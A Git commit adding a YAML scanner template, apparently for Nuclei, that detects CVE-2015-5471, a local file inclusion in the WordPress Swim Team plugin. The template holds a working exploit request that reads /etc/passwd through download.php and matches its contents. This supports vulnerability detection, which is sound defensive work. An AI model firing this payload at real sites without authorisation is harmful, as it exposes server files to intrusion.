Create CVE-2015-5471.yaml

patch-1
Roberto Nunes 2021-10-26 08:04:56 +09:00 committed by GitHub
parent 1c4db9df26
commit 5ad972dc6b
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 23 additions and 0 deletions

23
CVE-2015-5471.yaml Normal file
View File

@ -0,0 +1,23 @@
id: CVE-2015-5471
info:
name: Swim Team <= v1.44.10777 - Local File Inclusion
author: 0x_Akoko
severity: high
reference: https://wpscan.com/vulnerability/b00d9dda-721d-4204-8995-093f695c3568
tags: wordpress,plugin,wp,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename=/etc/passwd&contenttype=text/html&transient=1&abspath=/usr/share/wordpress"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200